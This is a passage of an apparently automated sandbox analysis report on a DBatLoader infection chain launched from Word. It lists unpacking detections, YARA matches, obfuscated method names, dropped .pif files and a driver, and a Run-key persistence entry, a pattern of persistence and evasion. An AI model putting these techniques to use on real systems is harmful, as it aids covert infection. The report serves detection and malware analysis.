00000014.00000002.3441954113.0000000029FF9000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000003.2406157824.00000000283ED000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000003.2431587396.0000000028445000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3450696077.000000002C9B0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: easinvoker.pdbGCTL source: brightness.exe, 00000008.00000002.2230547224.0000000021382000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2228361462.0000000020510000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2230785597.00000000214AA000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2199849372.0000000000874000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2198932373.000000007F410000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002460000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.000000000251A000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000003.2318408948.000000000070E000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000003.2318408948.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000011.00000003.2397508474.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000011.00000003.2397508474.0000000000889000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\Public\Libraries\jphwmyiA.pif	Unpacked PE file: 12.2.jphwmyiA.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Unpacked PE file: 16.2.jphwmyiA.pif.400000.1.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Unpacked PE file: 20.2.jphwmyiA.pif.400000.1.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\Public\Libraries\jphwmyiA.pif	Unpacked PE file: 12.2.jphwmyiA.pif.400000.0.unpack
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Unpacked PE file: 16.2.jphwmyiA.pif.400000.1.unpack
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Unpacked PE file: 20.2.jphwmyiA.pif.400000.1.unpack

Yara detected DBatLoader

Source: Yara match	File source: 8.2.brightness.exe.22c65a8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.brightness.exe.22c65a8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.brightness.exe.2830000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2213632449.00000000022C6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3410815376.0000000000B90000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2233031033.000000007FBB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3410702228.0000000000C20000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3410753000.0000000000B90000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000001.2321191405.0000000000B90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000001.2208904113.0000000000C20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000001.2400403863.0000000000B90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY

.NET source code contains method to dynamically call methods (often used by packers)

Source: 12.2.jphwmyiA.pif.25f2a8c6.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 12.3.jphwmyiA.pif.24507b80.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 12.2.jphwmyiA.pif.28fc0000.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 12.2.jphwmyiA.pif.28730ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 16.2.jphwmyiA.pif.1d140000.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 16.2.jphwmyiA.pif.1cb10ee8.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 16.3.jphwmyiA.pif.187dcca8.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

Source: jphwmyiA.pif.8.dr

Static PE information: 0x7BBD3E91 [Sun Oct 14 18:38:09 2035 UTC]

Source: C:\Windows\SysWOW64\brightness.exe

Code function: 8_2_02848798 LoadLibraryW,GetProcAddress,FreeLibrary,

8_2_02848798

Source: C:\Windows\SysWOW64\brightness.exe	Code function: 8_2_0285D2FC push 0285D367h; ret	8_2_0285D35F
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 8_2_028332FC push eax; ret	8_2_02833338
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 8_2_0283635A push 028363B7h; ret	8_2_028363AF
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 8_2_0283635C push 028363B7h; ret	8_2_028363AF
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 8_2_0285D0AC push 0285D125h; ret	8_2_0285D11D
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 8_2_0285D1F8 push 0285D288h; ret	8_2_0285D280
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 8_2_0285D144 push 0285D1ECh; ret	8_2_0285D1E4
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 8_2_028486B8 push 028486FAh; ret	8_2_028486F2
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 8_2_02836736 push 0283677Ah; ret	8_2_02836772
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 8_2_02836738 push 0283677Ah; ret	8_2_02836772
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 8_2_0283C4EC push ecx; mov dword ptr [esp], edx	8_2_0283C4F1
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 8_2_0283D520 push 0283D54Ch; ret	8_2_0283D544
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 8_2_0283CB6C push 0283CCF2h; ret	8_2_0283CCEA
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 8_2_0284788C push 02847909h; ret	8_2_02847901
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 8_2_028468C6 push 02846973h; ret	8_2_0284696B
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 8_2_028468C8 push 02846973h; ret	8_2_0284696B
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 8_2_0284E9E8 push ecx; mov dword ptr [esp], edx	8_2_0284E9ED
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 8_2_0284890E push 02848948h; ret	8_2_02848940
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 8_2_0284A917 push 0284A950h; ret	8_2_0284A948
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 8_2_02848910 push 02848948h; ret	8_2_02848940
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 8_2_0284A918 push 0284A950h; ret	8_2_0284A948
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 8_2_0283C967 push 0283CCF2h; ret	8_2_0283CCEA
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 8_2_02842EE0 push 02842F56h; ret	8_2_02842F4E
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 8_2_0285BFA0 push 0285C1C8h; ret	8_2_0285C1C0
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 8_2_02842FEC push 02843039h; ret	8_2_02843031
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 8_2_02842FEB push 02843039h; ret	8_2_02843031
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 8_2_02845DFC push ecx; mov dword ptr [esp], edx	8_2_02845DFE
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_0041C40C push cs; iretd	12_2_0041C4E2
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_00423149 push eax; ret	12_2_00423179
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_0041C50E push cs; iretd	12_2_0041C4E2
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_004231C8 push eax; ret	12_2_00423179

Source: 12.2.jphwmyiA.pif.25f2a8c6.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'Um61XJt4G2w4U', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 12.3.jphwmyiA.pif.24507b80.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'Um61XJt4G2w4U', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 12.2.jphwmyiA.pif.28fc0000.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'Um61XJt4G2w4U', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 12.2.jphwmyiA.pif.28730ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'Um61XJt4G2w4U', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 16.2.jphwmyiA.pif.1d140000.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'Um61XJt4G2w4U', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 16.2.jphwmyiA.pif.1cb10ee8.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'Um61XJt4G2w4U', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 16.3.jphwmyiA.pif.187dcca8.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'Um61XJt4G2w4U', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\brightness.exe	File created: C:\Users\Public\Libraries\jphwmyiA.pif			Jump to dropped file
Source: C:\Windows\SysWOW64\brightness.exe	File created: C:\Users\Public\Libraries\Aiymwhpj.PIF			Jump to dropped file

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Executable created and started: C:\Windows\SysWOW64\brightness.exe

Jump to behavior

Sample is not signed and drops a device driver

Source: C:\Windows\SysWOW64\brightness.exe	File created: C:\Windows \SysWOW64\truesight.sys	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	File created: C:\Windows \SysWOW64\truesight.sys	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	File created: C:\Windows \SysWOW64\truesight.sys

Source: C:\Windows\SysWOW64\brightness.exe	File created: C:\Users\Public\Libraries\jphwmyiA.pif	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	File created: C:\Windows\SysWOW64\brightness.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\brightness.exe	File created: C:\Users\Public\Libraries\Aiymwhpj.PIF	Jump to dropped file

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Windows\SysWOW64\brightness.exe

Jump to dropped file

Source: C:\Windows\SysWOW64\brightness.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Aiymwhpj			Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Aiymwhpj			Jump to behavior

Source: C:\Windows\SysWOW64\brightness.exe

Code function: 8_2_0284A954 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

8_2_0284A954

Source: C:\Users\Public\Libraries\jphwmyiA.pif	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
